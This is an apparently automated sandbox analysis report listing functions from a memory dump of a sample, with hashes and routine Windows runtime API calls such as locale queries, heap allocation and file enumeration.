Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: ea3582932523c7e9ae53c90c494ed8ca6167e213e53905ce55323cde19a776e6
Instruction ID: 2dab5a2aed192c8c3a6a11bb8771ca10c19faff316ca17aea4d69e5fef972a55
Opcode Fuzzy Hash: ea3582932523c7e9ae53c90c494ed8ca6167e213e53905ce55323cde19a776e6
Instruction Fuzzy Hash: 9CF0683210052ABBCF126F91ED099DE3F2BBF483A0F058120BA1865120CB32C972AF91

Uniqueness

Uniqueness Score: -1.00%

Function 0062F0FE Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?), ref: 0062F13F

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2b79d8bdd5629499ed0e3f9128550e13cf4a8959a35d6480962079328b88c85e
Instruction ID: 4effd5fc2ecc232cc04616a7d6af823be3567b0a616351d86ba1837bcf56a81c
Opcode Fuzzy Hash: 2b79d8bdd5629499ed0e3f9128550e13cf4a8959a35d6480962079328b88c85e
Instruction Fuzzy Hash: D6F0B431201935E6DB219B66FC0DA9B3B6AAFC1770B544131B804A7280DB60DC218EA0

Uniqueness

Uniqueness Score: -1.00%

Function 0062FD25 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0062FD57

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f3a9afcb1fd563e7d30587d1928f4955ad031597829a657afd22bb54f708fabd
Instruction ID: 7e8f7def667143d591b3e4d6ea9c9af5afa6001ddcb48ce4456ea678d3537621
Opcode Fuzzy Hash: f3a9afcb1fd563e7d30587d1928f4955ad031597829a657afd22bb54f708fabd
Instruction Fuzzy Hash: 5AE0652124593267D7312B75FC057DB7A6AEF827A4F150930BC55AA290DBA0CC418EA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 006412A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00641339
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00641362
GetACP.KERNEL32 ref: 00641377

Strings

OCP, xrefs: 006412F4
ACP, xrefs: 006412BE

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 54b70f1a1b9726729527ba90307b0a7ff65dd0face5a83244d952cd661d6da98
Instruction ID: d5d6b2e9e2b5a361cc8e791d0c2ab8d8a7cc7d915a0e07eddcffc68761057685
Opcode Fuzzy Hash: 54b70f1a1b9726729527ba90307b0a7ff65dd0face5a83244d952cd661d6da98
Instruction Fuzzy Hash: CC21C522700101EADB369F64C904AD776ABBF52F54B568125E90ADF700E732DEC1C350

Uniqueness

Uniqueness Score: -1.00%

Function 006414E9 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 006415F5
IsValidCodePage.KERNEL32(00000000), ref: 0064163E
IsValidLocale.KERNEL32(?,00000001), ref: 0064164D
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00641695
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 006416B4

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: c7290953ea1e399f7fd0c32a0a10d3252e9078fce4a7d32f3b710105d8660295
Instruction ID: f4940e34a9376764c2215731ec437d39d970a490af75d4d3165c549aa173add1
Opcode Fuzzy Hash: c7290953ea1e399f7fd0c32a0a10d3252e9078fce4a7d32f3b710105d8660295
Instruction Fuzzy Hash: 525173B1A00209AFEB10DFA5CC45AEF77BABF46701F190529EA05EB250E770D984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0064090D Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 006409CE
IsValidCodePage.KERNEL32(00000000), ref: 006409F9
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00640BDA

Strings

utf8, xrefs: 00640ACB

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: CodeInfoLocalePageValid
String ID: utf8
API String ID: 790303815-905460609
Opcode ID: 17c26556bb8eddb4f350972f8639d141c8023c0276498d45655727789e427aad
Instruction ID: 9dd5949b4279cb7e545852213904cc75772b50c18677db2a07e142b72ac632fc
Opcode Fuzzy Hash: 17c26556bb8eddb4f350972f8639d141c8023c0276498d45655727789e427aad
Instruction Fuzzy Hash: 6D71C771640326AAFB24AB74CC86BAB77AEEF45710F144469F605D7282EBB0DD81C790

Uniqueness

Uniqueness Score: -1.00%

Function 0063BC41 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0063BCDC
FindNextFileW.KERNEL32(00000000,?), ref: 0063BD57
FindClose.KERNEL32(00000000), ref: 0063BD79
FindClose.KERNEL32(00000000), ref: 0063BD9C

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: ea0944e70795ad8acdb5a9068231116262ec3cb26898e1fa2c556a3da52f0191
Instruction ID: aa0e3f9dc1d7d6ca316367e01844c8c31c05dcbc14292c026e2ce9fa79444dcc
Opcode Fuzzy Hash: ea0944e70795ad8acdb5a9068231116262ec3cb26898e1fa2c556a3da52f0191
Instruction Fuzzy Hash: BD41A371900529AFDB20DF68CC89AFEB7BAEF84315F145195E505D7240EB309E80CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 005E313B Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005E3147
IsDebuggerPresent.KERNEL32 ref: 005E3213
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005E3233
UnhandledExceptionFilter.KERNEL32(?), ref: 005E323D

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 92b7f3f9380a25da180767282cdaab1b75765470551c762d7941f17cc47da396
Instruction ID: 0b917c9d5dc8d3feb866c933b884bf0afe45a674a5e93debfb6e8f1d7c7ad626
Opcode Fuzzy Hash: 92b7f3f9380a25da180767282cdaab1b75765470551c762d7941f17cc47da396
Instruction Fuzzy Hash: 11313AB5D052199BDB10EFA4D989BCCBBB8BF04304F1041AAE54DA7250EB705B85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 005BA6EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 005BA701
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 005BA723

Strings

!x-sys-default-locale, xrefs: 005BA6FC

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 3a5ae7e31357a183011335f11b5d64beeef93dd12a90359bd3d7224694fb9316
Instruction ID: bdaf354561cbb4682c69d679e5731cd12e0908cd049d5f41230a990d0de14cf4
Opcode Fuzzy Hash: 3a5ae7e31357a183011335f11b5d64beeef93dd12a90359bd3d7224694fb9316
Instruction Fuzzy Hash: 9CE030B2550208BEEB049F90CC0BDBA7B6DEB05795F104114B901D3180E6B06E44C660

Uniqueness

Uniqueness Score: -1.00%

Function 00625F1A Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 166COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,006B6762,00000104), ref: 00625F77

Strings

Runtime Error!Program: , xrefs: 00625F43
Microsoft Visual C++ Runtime Library, xrefs: 0062600C
0gk, xrefs: 00625FE2
..., xrefs: 00625FC5
bgk, xrefs: 00625F6A
<program name unknown>, xrefs: 00625F86

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: FileModuleName
String ID: ...$0gk$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $bgk
API String ID: 514040917-2811729286
Opcode ID: 4f82ac916647ab772f9af678807edd45573e7677bad14b53bd83077527818f32
Instruction ID: 4ee464f50164346b524c54ffde5b1529c389a13a49b3a3d063d65b0685a10bb7
Opcode Fuzzy Hash: 4f82ac916647ab772f9af678807edd45573e7677bad14b53bd83077527818f32
Instruction Fuzzy Hash: 4F214C72A00B2227DB302625FE4AEDF3E8FDF9675CF050031FD0892641F565CA55CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0062E2EE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 0062E3AF

Strings

api-ms-, xrefs: 0062E345
ext-ms-, xrefs: 0062E359

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 9c7473a555173bde42a9c3d5b91f80aedabb97b80fca65f20142fc801d455dfe
Instruction ID: 9fb310baf6b00918ac728e9e2d3201bd6b40c0b44e03eb70fc0ae26267134095
Opcode Fuzzy Hash: 9c7473a555173bde42a9c3d5b91f80aedabb97b80fca65f20142fc801d455dfe
Instruction Fuzzy Hash: D521BE71901A31EBCB21D765BC44A9A376B9B56771F150234ED16A73D0EB31EE01CDD0

Uniqueness

Uniqueness Score: -1.00%

Function 005E1893 Relevance: 9.2, APIs: 6, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 005E191E
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005E19AC
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005E1A1E
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005E1A38
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005E1A9B
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 005E1AB8

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 830a363074827d1d585acf24666b4bd5828357d2575cdc0904b72564b94906d9
Instruction ID: fc913d7cec7f37b071034a0e3cedce47af50c77b4dc18be59d4ef335b102b64e
Opcode Fuzzy Hash: 830a363074827d1d585acf24666b4bd5828357d2575cdc0904b72564b94906d9
Instruction Fuzzy Hash: FC71E171900A8AAEDF289FA6CC55AFE7FBAFF45354F180025E481E7151DB31C840CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 005BF651 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 005BF69A
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 005BF705
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BF722
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005BF761
LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 005BF7C0
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005BF7E3

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: f61595ed5ce3743d2e7eeb0c22076f01ed00e88074ee7e06b8641705e90dbdfd
Instruction ID: cb65152abf7a8c718206171201db0be63d4efa036b139852cbfab38fd506a989
Opcode Fuzzy Hash: f61595ed5ce3743d2e7eeb0c22076f01ed00e88074ee7e06b8641705e90dbdfd
Instruction Fuzzy Hash: B7518B72500216AFEB209F64CC49FEA7FAAFB84750F254575F904A6160DB31AD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005B9DEF Relevance: 9.2, APIs: 6, Instructions: 153threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005B9E17
GetCurrentThreadId.KERNEL32 ref: 005B9E34
GetCurrentThreadId.KERNEL32 ref: 005B9E55
GetCurrentThreadId.KERNEL32 ref: 005B9ED8
GetCurrentThreadId.KERNEL32 ref: 005B9F1C
GetCurrentThreadId.KERNEL32 ref: 005B9F62

Memory Dump Source

